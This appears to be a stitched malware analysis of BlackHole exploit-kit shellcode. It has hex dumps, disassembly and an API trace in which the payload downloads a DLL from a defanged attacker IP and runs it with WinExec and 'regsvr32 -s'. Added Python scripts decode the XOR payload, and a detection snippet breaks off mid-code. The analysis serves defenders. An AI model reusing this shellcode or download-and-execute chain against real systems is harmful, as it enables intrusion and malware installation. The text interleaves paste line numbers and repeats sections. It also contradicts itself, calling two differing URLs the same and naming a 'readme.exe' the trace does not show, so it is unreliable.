000001C6  58                pop eax
000001C7  07                pop es
000001C8  4A                dec edx
000001C9  5D                pop ebp
000001CA  41                inc ecx
000001CB  44                inc esp
000001CC  774B              ja 0x219
000001CE  4D                dec ebp
000001CF  5E                pop esi
000001D0  5B                pop ebx
000001D1  5A                pop edx
000001D2  47                inc edi
000001D3  41                inc ecx
000001D4  06                push es
000001D5  46                inc esi
000001D6  40                inc eax
000001D7  58                pop eax
000001D8  17                pop ss
000001D9  58                pop eax
000001DA  4E                dec esi
000001DB  5C                pop esp
000001DC  1B1512184619      sbb edx,[dword 0x19461812]
000001E2  1912              sbb [edx],edx
000001E4  124141            adc al,[ecx+0x41]
000001E7  191B              sbb [ebx],ebx
000001E9  120E              adc cl,[esi]
000001EB  1B4D5F            sbb ecx,[ebp+0x5f]
000001EE  1A15125E4319      sbb dl,[dword 0x19435e12]
000001F4  1912              sbb [edx],edx
000001F6  12451A            adc al,[ebp+0x1a]
000001F9  1B1B              sbb ebx,[ebx]
000001FB  1212              adc dl,[edx]
000001FD  1B4319            sbb eax,[ebx+0x19]
00000200  1912              sbb [edx],edx
00000202  124319            adc al,[ebx+0x19]
00000205  1B19              sbb ebx,[ecx]
00000207  1212              adc dl,[edx]
00000209  42                inc edx
0000020A  47                inc edi
0000020B  19590E            sbb [ecx+0xe],ebx
0000020E  19150E434045      sbb [dword 0x4540430e],edx
00000214  58                pop eax
00000215  155E0E155E        adc eax,0x5e150e5e
0000021A  285A00            sub [edx+0x0],bl ; math
0000021D  28                db 0x28

// gathered blocks of API..
blocks..   translation..
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?tf=30:1n:1i:1i:33&we=2v:1k:1m:32:33:1k:1k:31:1j:1o&q=1k&mh=p&vv=r, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)


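The JavaScript at the top of this section unwraps the sprayed string (reverse it, turn "%!" into "%u"), the decoder stub at the start of the hex view XORs the payload with a single byte, and the API block above shows the URL that comes out. As an added example (not code from the paste or from MalwareMustDie), here is a Python re-implementation of those steps that reads the XOR key and length from the stub's opcodes instead of hard-coding them and carves the download URL from the page's own data: the stub is the first 32 bytes of the first hex view, the tail is the first 63 tokens of string `b` (which, being stored reversed, is the end of the shellcode where the URL lives). Feeding the whole string `b` through the same functions works the same way.

```python
"""Decode the BlackHole %u-sprayed shellcode from this paste and carve its payload URL.

Re-implements the three steps the paste performs by hand:
  1. the landing page's JavaScript unwrapping: reverse the string, turn "%!" into "%u";
  2. JavaScript unescape() semantics: each %uXXXX is one 16-bit unit, little-endian in memory;
  3. the shellcode's own XOR decoder stub, whose key and length are read from its opcodes.
"""
import re
import struct

# Excerpt from the paste: the first 32 bytes of the first "view" hex dump (the decoder stub).
STUB = bytes.fromhex(
    "41414141 6683e4fc fceb1058 31c96681"
    "e903fe80 302840e2 faeb05e8 ebffffff"
)

# Excerpt from the paste: the first 63 tokens of the obfuscated string "b". The string is
# stored reversed, so this prefix is the tail of the shellcode, where the URL lives.
OBFUSCATED_TAIL = (
    "8200!%a582!%e551!%e0e5!%5185!%5404!%34e0!%5191!%e095!%9174!%2421!%2191!%"
    "b191!%3421!%2191!%9134!%b121!%21b1!%b1a1!%5421!%2191!%9134!%e521!%51a1!%"
    "f5d4!%b1e0!%21b1!%9114!%1421!%2191!%9164!%8121!%51b1!%c5e4!%8571!%8504!%"
    "6460!%1474!%a5b5!%e5d4!%b477!%4414!%d5a4!%7085!%34b5!%1464!%7044!%d554!%"
    "74a5!%70e4!%0181!%0181!%9121!%60a1!%a1c1!%60a1!%f1d1!%6091!%c1e1!%7070!%"
    "8521!%c5c5!%8504!%"
)


def unwrap_js_string(obfuscated):
    r"""Step 1: equivalent of  s.split("").reverse().join("").replace(/\%!/g, "%u")."""
    return obfuscated[::-1].replace("%!", "%u")


def unescape_to_bytes(escaped):
    """Step 2: unescape() turns each %uXXXX into a 16-bit code unit; the heap holds them
    little-endian, so %u8366 becomes the bytes 66 83 (compare the hex dump above)."""
    units = re.findall(r"%u([0-9a-fA-F]{4})", escaped)
    if len(units) * 6 != len(escaped):
        raise ValueError("input is not purely %uXXXX tokens")
    return b"".join(struct.pack("<H", int(u, 16)) for u in units)


def parse_decoder_stub(shellcode):
    """Step 3a: recover (xor_key, byte_count, payload_offset) from the stub's opcodes.
       66 81 e9 LO HI   sub cx, imm16    -> cx = (-imm16) & 0xffff bytes to decode
       80 30 KEY        xor byte [eax], KEY
       40 / e2 fa       inc eax / loop
       e8 eb ff ff ff   call back to the pop eax; the encoded payload starts right after it"""
    m = re.search(rb"\x66\x81\xe9(..)\x80\x30(.)\x40\xe2", shellcode, re.DOTALL)
    if m is None:
        raise ValueError("no BlackHole-style XOR decoder stub found")
    byte_count = (-struct.unpack("<H", m.group(1))[0]) & 0xFFFF
    xor_key = m.group(2)[0]
    call = shellcode.find(b"\xe8\xeb\xff\xff\xff", m.end())
    if call < 0:
        raise ValueError("decoder stub has no call/pop address trick")
    return xor_key, byte_count, call + 5


def xor_decode(data, key):
    """Step 3b: the loop body, xor byte [eax], KEY, applied to the whole buffer."""
    return bytes(b ^ key for b in data)


def carve_url(decoded):
    """The download URL sits at the end of the decoded payload, NUL-terminated."""
    start = decoded.find(b"http")
    if start < 0:
        raise ValueError("no URL in decoded shellcode")
    end = decoded.find(b"\x00", start)
    return decoded[start:end if end >= 0 else None].decode("ascii")


def extract_payload_url(stub, obfuscated_tail):
    """Glue: key from the stub, bytes from the sprayed string, URL from the XOR output."""
    xor_key, _count, _offset = parse_decoder_stub(stub)
    tail = unescape_to_bytes(unwrap_js_string(obfuscated_tail))
    return carve_url(xor_decode(tail, xor_key))


if __name__ == "__main__":
    key, count, offset = parse_decoder_stub(STUB)
    print("xor key 0x%02x, %d bytes, payload at offset 0x%x" % (key, count, offset))
    print(extract_payload_url(STUB, OBFUSCATED_TAIL))
```

The URL it recovers is the same one the URLDownloadToFileA block above shows, so the static decode and the emulated API trace corroborate each other.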
  510.  
// same one.... different code.. in url parts.. two time...

// raws..

// view...
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
e9 03 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff  ....0(@.........
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04  X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3  ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3  .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4  \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b  .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3  .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3  $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b  +..vq..{..@..U$.
5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7  \+....@...B-q...
d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28  .....((((pxBh@.(
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d  ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab  ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c  .....I....*.Z..,
29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c  )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40  .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28  .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21  _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28  (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e  {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3  ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42  ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2  ..~.......f&....
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07  &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07  1c 1e 06 19 1f 1d 06 1a  X@\\X...........
1a 1c 06 1a 19 12 10 18  10 18 07 4e 47 5a 5d 45  ...........NGZ]E
07 44 41 46 43 5b 07 58  5d 4a 44 41 4b 77 5e 4d  .DAFC[.X]JDAKw^M
5a 5b 41 47 46 06 58 40  58 17 46 4e 15 19 40 12  Z[AGF.X@X.FN..@.
19 42 12 19 42 12 1b 1a  12 19 4e 0e 42 4d 15 19  .B..B.....N.BM..
42 12 1b 1b 12 1b 1a 12  19 44 12 19 4f 12 19 41  B........D..O..A
12 19 47 12 19 46 12 19  47 12 19 41 0e 5c 15 19  ..G..F..G..A.\..
43 0e 47 51 15 58 0e 42  40 15 41 28 28 00        C.GQ.X.B@.A((.

//disasm...
00000000  41                inc ecx
00000001  41                inc ecx
  555. 00000002  41                inc ecx
  556. 00000003  41                inc ecx
  557. 00000004  8366FCE4          and dword [esi-0x4],byte -0x1c
  558. 00000008  EBFC              jmp short 0x6 ; loop
  559. 0000000A  58                pop eax
  560. 0000000B  10C9              adc cl,cl
  561. 0000000D  31816603E980      xor [ecx-0x7f16fc9a],eax ; decryption
  562. 00000013  FE                db 0xfe
  563. 00000014  2830              sub [eax],dh ; math
  564. 00000016  E240              loop 0x58 ; loop
  565. 00000018  EBFA              jmp short 0x14 ; loop
  566. 0000001A  E805FFEBFF        call dword 0xffebff24 ; call
  567. 0000001F  FFCC              dec esp
  568. 00000021  AD                lodsd
  569. 00000022  1C5D              sbb al,0x5d
  570. 00000024  77C1              ja 0xffffffe7
  571. 00000026  E81BA34C18        call dword 0x184ca346 ; call
  572. 0000002B  6868A3A324        push dword 0x24a3a368
  573. 00000030  3458              xor al,0x58 ; decryption
  574. 00000032  A37E205EF3        mov [0xf35e207e],eax
  575. 00000037  1BA34E14765C      sbb esp,[ebx+0x5c76144e]
  576. 0000003D  2B041B            sub eax,[ebx+ebx] ; math
  577. 00000040  C6                db 0xc6
  578. 00000041  A9383DD7D7        test eax,0xd7d73d38
  579. 00000046  A39018686E        mov [0x6e681890],eax
  580. 0000004B  EB2E              jmp short 0x7b ; loop
  581. 0000004D  11D3              adc ebx,edx
  582. 0000004F  5D                pop ebp
  583. 00000050  1CAF              sbb al,0xaf
  584. 00000052  AD                lodsd
  585. 00000053  0C5D              or al,0x5d
  586. 00000055  CC                int3
  587. 00000056  C17964C3          sar dword [ecx+0x64],0xc3
  588. 0000005A  7E79              jng 0xd5
  589. 0000005C  5D                pop ebp
  590. 0000005D  A3A3141D5C        mov [0x5c1d14a3],eax
  591. 00000062  2B507E            sub edx,[eax+0x7e] ; math
  592. 00000065  DD5EA3            fstp qword [esi-0x5d]
  593. 00000068  2B08              sub ecx,[eax] ; math
  594. 0000006A  1BDD              sbb ebx,ebp
  595. 0000006C  61                popad
  596. 0000006D  E1D4              loope 0x43
  597. 0000006F  692B851BED27      imul ebp,[ebx],dword 0x27ed1b85
  598. 00000075  F33896DA10205C    rep cmp [esi+0x5c2010da],dl
  599. 0000007C  E3E9              jecxz 0x67
  600. 0000007E  2B2568F2D9C3      sub esp,[dword 0xc3d9f268] ; math
  601. 00000084  37                aaa
  602. 00000085  13CE              adc ecx,esi
  603. 00000087  5D                pop ebp
  604. 00000088  A3760C76F5        mov [0xf5760c76],eax
  605. 0000008D  2BA34E63246E      sub esp,[ebx+0x6e24634e] ; math
  606. 00000093  A5                movsd
  607. 00000094  D7                xlatb
  608. 00000095  C40C7C            les ecx,[esp+edi*2]
  609. 00000098  A3242BF0A3        mov [0xa3f02b24],eax
  610. 0000009D  F5                cmc
  611. 0000009E  A32CED2B76        mov [0x762bed2c],eax
  612. 000000A3  83EB71            sub ebx,byte +0x71 ; math
  613. 000000A6  7BC3              jpo 0x6b
  614. 000000A8  A385084055        mov [0x55400885],eax
  615. 000000AD  A81B              test al,0x1b
  616. 000000AF  242B              and al,0x2b
  617. 000000B1  5C                pop esp
  618. 000000B2  C3                ret
  619. 000000B3  BEA3DB2040        mov esi,0x4020dba3
  620. 000000B8  DFA32D42C071      fbld tword [ebx+0x71c0422d]
  621. 000000BE  D7                xlatb
  622. 000000BF  B0D7              mov al,0xd7
  623. 000000C1  D7                xlatb
  624. 000000C2  D1CA              ror edx,1 ; bitwise cipher
  625. 000000C4  28C0              sub al,al ; math
  626. 000000C6  2828              sub [eax],ch ; math
  627. 000000C8  7028              jo 0xf2
  628. 000000CA  42                inc edx
  629. 000000CB  7840              js 0x10d
  630. 000000CD  6828D72828        push dword 0x2828d728
  631. 000000D2  AB                stosd
  632. 000000D3  7831              js 0x106
  633. 000000D5  E87D78C4A3        call dword 0xa3c47957 ; call
  634. 000000DA  76A3              jna 0x7f
  635. 000000DC  AB                stosd
  636. 000000DD  382DEBCBD747      cmp [dword 0x47d7cbeb],ch
  637. 000000E3  40                inc eax
  638. 000000E4  284640            sub [esi+0x40],al ; math
  639. 000000E7  285A5D            sub [edx+0x5d],bl ; math
  640. 000000EA  45                inc ebp
  641. 000000EB  44                inc esp
  642. 000000EC  D7                xlatb
  643. 000000ED  7CAB              jl 0x9a
  644. 000000EF  3E20EC            ds and ah,ch
  645. 000000F2  C0A349C0D7D7C3    shl byte [ebx-0x28283fb7],0xc3
  646. 000000F9  D7                xlatb
  647. 000000FA  C3                ret
  648. 000000FB  2AA95A2CC428      sub ch,[ecx+0x28c42c5a] ; math
  649. 00000101  29A5280C74EF      sub [ebp-0x108bf3d8],esp ; math
  650. 00000107  240C              and al,0xc
  651. 00000109  2C4D              sub al,0x4d ; math
  652. 0000010B  5A                pop edx
  653. 0000010C  5B                pop ebx
  654. 0000010D  4F                dec edi
  655. 0000010E  6C                insb
  656. 0000010F  EF                out dx,eax
  657. 00000110  2C0C              sub al,0xc ; math
  658. 00000112  5A                pop edx
  659. 00000113  5E                pop esi
  660. 00000114  1A1B              sbb bl,[ebx]
  661. 00000116  6C                insb
  662. 00000117  EF                out dx,eax
  663. 00000118  200C0508085B40    and [eax+0x405b0808],cl
  664. 0000011F  7B28              jpo 0x149
  665. 00000121  D028              shr byte [eax],1
  666. 00000123  287ED7            sub [esi-0x29],bh ; math
  667. 00000126  A3241BC079        mov [0x79c01b24],eax
  668. 0000012B  E16C              loope 0x199
  669. 0000012D  EF                out dx,eax
  670. 0000012E  2835585F5C4A      sub [dword 0x4a5c5f58],dh ; math
  671. 00000134  6C                insb
  672. 00000135  EF                out dx,eax
  673. 00000136  2D354C0644        sub eax,0x44064c35 ; math
  674. 0000013B  44                inc esp
  675. 0000013C  6C                insb
  676. 0000013D  EE                out dx,al
  677. 0000013E  21357128E9A2      and [dword 0xa2e92871],esi
  678. 00000144  182C6C            sbb [esp+ebp*2],ch
  679. 00000147  A02C357969        mov al,[0x6979352c]
  680. 0000014C  284228            sub [edx+0x28],al ; math
  681. 0000014F  42                inc edx
  682. 00000150  7F7B              jg 0x1cd
  683. 00000152  28427E            sub [edx+0x7e],al ; math
  684. 00000155  D7                xlatb
  685. 00000156  AD                lodsd
  686. 00000157  3C5D              cmp al,0x5d
  687. 00000159  E8423E7B28        call dword 0x287b3fa0 ; call
  688. 0000015E  7ED7              jng 0x137
  689. 00000160  42                inc edx
  690. 00000161  2CAB              sub al,0xab ; math
  691. 00000163  2824C3            sub [ebx+eax*8],ah ; math
  692. 00000166  D7                xlatb
  693. 00000167  7B2C              jpo 0x195
  694. 00000169  7EEB              jng 0x156
  695. 0000016B  AB                stosd
  696. 0000016C  C3                ret
  697. 0000016D  24C3              and al,0xc3
  698. 0000016F  2A6F3B            sub ch,[edi+0x3b] ; math
  699. 00000172  17                pop ss
  700. 00000173  A85D              test al,0x5d
  701. 00000175  286FD2            sub [edi-0x2e],ch ; math
  702. 00000178  17                pop ss
  703. 00000179  A85D              test al,0x5d
  704. 0000017B  2842EC            sub [edx-0x14],al ; math
  705. 0000017E  42                inc edx
  706. 0000017F  28D7              sub bh,dl ; math
  707. 00000181  D6                salc
  708. 00000182  207EB4            and [esi-0x4c],bh
  709. 00000185  C0D7D6            rcl bh,0xd6
  710. 00000188  A6                cmpsb
  711. 00000189  D7                xlatb
  712. 0000018A  2666B0C4          es o16 mov al,0xc4
  713. 0000018E  A2D6A12629        mov [0x2926a1d6],al
  714. 00000193  47                inc edi
  715. 00000194  1B95A2E23373      sbb edx,[ebp+0x7333e2a2]
  716. 0000019A  6E                outsb
  717. 0000019B  EE                out dx,al
  718. 0000019C  1E                push ds
  719. 0000019D  51                push ecx
  720. 0000019E  07                pop es
  721. 0000019F  324058            xor al,[eax+0x58] ; decryption
  722. 000001A2  5C                pop esp
  723. 000001A3  5C                pop esp
  724. 000001A4  125807            adc bl,[eax+0x7]
  725. 000001A7  07                pop es
  726. 000001A8  1E                push ds
  727. 000001A9  1C19              sbb al,0x19
  728. 000001AB  06                push es
  729. 000001AC  1D1F1A061C        sbb eax,0x1c061a1f
  730. 000001B1  1A1A              sbb bl,[edx]
  731. 000001B3  06                push es
  732. 000001B4  1219              adc bl,[ecx]
  733. 000001B6  1810              sbb [eax],dl
  734. 000001B8  1810              sbb [eax],dl
  735. 000001BA  4E                dec esi
  736. 000001BB  07                pop es
  737. 000001BC  5A                pop edx
  738. 000001BD  47                inc edi
  739. 000001BE  45                inc ebp
  740. 000001BF  5D                pop ebp
  741. 000001C0  44                inc esp
  742. 000001C1  07                pop es
  743. 000001C2  46                inc esi
  744. 000001C3  41                inc ecx
  745. 000001C4  5B                pop ebx
  746. 000001C5  43                inc ebx
  747. 000001C6  58                pop eax
  748. 000001C7  07                pop es
  749. 000001C8  4A                dec edx
  750. 000001C9  5D                pop ebp
  751. 000001CA  41                inc ecx
  752. 000001CB  44                inc esp
  753. 000001CC  774B              ja 0x219
  754. 000001CE  4D                dec ebp
  755. 000001CF  5E                pop esi
  756. 000001D0  5B                pop ebx
  757. 000001D1  5A                pop edx
  758. 000001D2  47                inc edi
  759. 000001D3  41                inc ecx
  760. 000001D4  06                push es
  761. 000001D5  46                inc esi
  762. 000001D6  40                inc eax
  763. 000001D7  58                pop eax
  764. 000001D8  17                pop ss
  765. 000001D9  58                pop eax
  766. 000001DA  4E                dec esi
  767. 000001DB  5C                pop esp
  768. 000001DC  1B1512184619      sbb edx,[dword 0x19461812]
  769. 000001E2  1912              sbb [edx],edx
  770. 000001E4  124141            adc al,[ecx+0x41]
  771. 000001E7  191B              sbb [ebx],ebx
  772. 000001E9  120E              adc cl,[esi]
  773. 000001EB  1B4D5F            sbb ecx,[ebp+0x5f]
  774. 000001EE  1A15125E4319      sbb dl,[dword 0x19435e12]
  775. 000001F4  1912              sbb [edx],edx
  776. 000001F6  12451A            adc al,[ebp+0x1a]
  777. 000001F9  1B1B              sbb ebx,[ebx]
  778. 000001FB  1212              adc dl,[edx]
  779. 000001FD  1B4319            sbb eax,[ebx+0x19]
  780. 00000200  1912              sbb [edx],edx
  781. 00000202  124319            adc al,[ebx+0x19]
  782. 00000205  1B19              sbb ebx,[ecx]
  783. 00000207  1212              adc dl,[edx]
  784. 00000209  42                inc edx
  785. 0000020A  47                inc edi
  786. 0000020B  19590E            sbb [ecx+0xe],ebx
  787. 0000020E  19150E434045      sbb [dword 0x4540430e],edx
  788. 00000214  58                pop eax
  789. 00000215  155E0E155E        adc eax,0x5e150e5e
  790. 0000021A  285A00            sub [edx+0x0],bl ; math
  791. 0000021D  28                db 0x28
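
// Note on the disassembly above: only the first 0x20 bytes are real code. By my reading of the dump, the stub at 0x0e..0x1f is sub cx,imm16 / xor byte [eax],0x28 / inc eax / loop / jmp +5 / call back to the pop eax at 0x0b, and the 0x1fd bytes from 0x20 onwards are XOR-encoded with 0x28 until run time, which is why they disassemble to noise such as fstp and out dx. An added example, not from these notes: a Python script that parses the "view..." dump as pasted, reads key, length and start offset out of the stub, and applies the XOR statically, so a responder can pull the download URL (the same one the API translation further down shows) from a captured buffer without executing it. The hex dump is a constructed copy of the one above; the stub regex assumes exactly this stub shape.

```python
import re
import struct

# Constructed copy of the second "view..." hex dump in these notes, in the same
# "hex hex ...  ASCII" layout (no offset column).
DUMP = r"""
41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81  AAAAf......X1.f.
e9 03 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff  ....0(@.........
ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3  ..]..w..L.h..h$.
58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04  X4~.^...N.v.+\..
a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3  ..=8....h..n..].
af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3  .....]y..dy~.]..
5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4  \.P+.~.^.+...ai.
85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b  .+...'.8..\...%+
f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3  .h...7].v.v.+.N.
24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3  $c.n..|.$..+..,.
2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b  +..vq..{..@..U$.
5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7  \+....@...B-q...
d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28  .....((((pxBh@.(
28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d  ((x..1x}...v8..-
d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab  ..@GF((@]ZDE|.>.
ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c  .....I....*.Z..,
29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c  )((.t.$.,.ZMO[.l
0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40  .,^Z...l....[.{@
d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28  .(((.~$....y.l5(
5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21  _XJ\.l5-.LDD.l5!
28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28  (q..,..l5,iyB(B(
7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e  {.B(.~<..]>B({.~
2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3  ,B(..${.~,..$.*.
3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42  ;o..(].o..(].B(B
d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2  ..~.......f&....
26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07  &.G)....s3.nQ.2.
58 40 5c 5c 58 12 07 07  1c 1e 06 19 1f 1d 06 1a  X@\\X...........
1a 1c 06 1a 19 12 10 18  10 18 07 4e 47 5a 5d 45  ...........NGZ]E
07 44 41 46 43 5b 07 58  5d 4a 44 41 4b 77 5e 4d  .DAFC[.X]JDAKw^M
5a 5b 41 47 46 06 58 40  58 17 46 4e 15 19 40 12  Z[AGF.X@X.FN..@.
19 42 12 19 42 12 1b 1a  12 19 4e 0e 42 4d 15 19  .B..B.....N.BM..
42 12 1b 1b 12 1b 1a 12  19 44 12 19 4f 12 19 41  B........D..O..A
12 19 47 12 19 46 12 19  47 12 19 41 0e 5c 15 19  ..G..F..G..A.\..
43 0e 47 51 15 58 0e 42  40 15 41 28 28 00        C.GQ.X.B@.A((.
"""

HEX_PAIR = re.compile(r"[0-9a-fA-F]{2}")

def parse_hexdump(text):
    """Collect the hex pairs of each line; the first non-pair token is the ASCII column."""
    out = bytearray()
    for line in text.splitlines():
        for tok in line.split():
            if not HEX_PAIR.fullmatch(tok):
                break
            out.append(int(tok, 16))
    return bytes(out)

# The stub as pasted: sub cx,imm16 / xor byte [eax],KEY / inc eax / loop / jmp +5 / call rel32.
# The call pushes the address right after itself, which the pop eax it jumps to collects,
# so m.end() is where the encoded payload starts.
DECODER = re.compile(rb"\x66\x81\xe9(..)\x80\x30(.)\x40\xe2\xfa\xeb\x05\xe8(....)", re.DOTALL)

def find_decoder(buf):
    """Return (xor key, payload offset, payload length) read out of the stub itself."""
    m = DECODER.search(buf)
    if m is None:
        raise ValueError("no XOR decoder stub of the expected shape in buffer")
    length = (-struct.unpack("<H", m.group(1))[0]) & 0xFFFF   # cx = 0 - imm16
    key = m.group(2)[0]
    rel = struct.unpack("<i", m.group(3))[0]
    payload = m.end()
    if buf[payload + rel] != 0x58:       # the call must land on 'pop eax'
        raise ValueError("call target is not pop eax; not the expected stub")
    return key, payload, length

def decode_payload(buf):
    key, start, length = find_decoder(buf)
    return bytes(b ^ key for b in buf[start:start + length])

def defang(url):
    return url.replace("http", "h00p", 1)   # keep recovered IoCs unclickable, as the notes do

def recover_urls(dump_text=DUMP):
    decoded = decode_payload(parse_hexdump(dump_text))
    return [defang(m.decode("ascii")) for m in re.findall(rb"https?://[\x21-\x7e]+", decoded)]

if __name__ == "__main__":
    key, start, length = find_decoder(parse_hexdump(DUMP))
    print(f"key=0x{key:02x} payload=0x{start:x} length=0x{length:x}")
    for url in recover_urls():
        print(url)
```

The recovered string is the readme.exe download URL, identical to the szURL argument in the URLDownloadToFileA line of the API translation, which confirms the translation without letting the shellcode run.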
  792.  
  793. //translating API..
  794.  
  795. blocks.... translation...
  796. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  797. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  798. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])    
  799. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://46.175.224.21:8080/forum/links/public_version.php?nf=1h:1j:1j:32:1f&je=1j:33:32:1l:1g:1i:1o:1n:1o:1i&t=1k&oy=p&jh=i, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  800. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  801. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  802. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
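
// The API translation above is the whole download-and-execute chain: urlmon.URLDownloadToFileA writes wpbt0.dll into the user's Temp folder, WinExec runs it directly, then runs it again through regsvr32 -s. An added example, not from these notes: a small check over constructed process-creation events (Sysmon Event ID 1 field names) that flags exactly that pattern on an endpoint. The paths follow the trace; the parent process (iexplore.exe), the benign installer event and the plugin-host list are assumptions for illustration.

```python
import re

# Constructed events, not real telemetry. Paths follow the API trace above; the
# parent process and the benign regsvr32 event are assumptions.
EVENTS = [
    {"Image": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": r'"C:\Program Files\Internet Explorer\iexplore.exe"',
     "ParentImage": r"C:\WINDOWS\explorer.exe"},
    {"Image": r"C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll",           # WinExec(wpbt0.dll)
     "CommandLine": r"C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"Image": r"C:\WINDOWS\system32\regsvr32.exe",                              # WinExec(regsvr32 -s ...)
     "CommandLine": r"regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe"},
    {"Image": r"C:\WINDOWS\system32\regsvr32.exe",                              # benign: installer registering its own DLL
     "CommandLine": r'regsvr32 /s "C:\Program Files\ExampleVendor\component.dll"',
     "ParentImage": r"C:\WINDOWS\system32\msiexec.exe"},
]

# matches LOCALS~1\Temp\, Local Settings\Temp\ and AppData\Local\Temp\ alike
TEMP_DIR = re.compile(r"\\temp\\", re.IGNORECASE)
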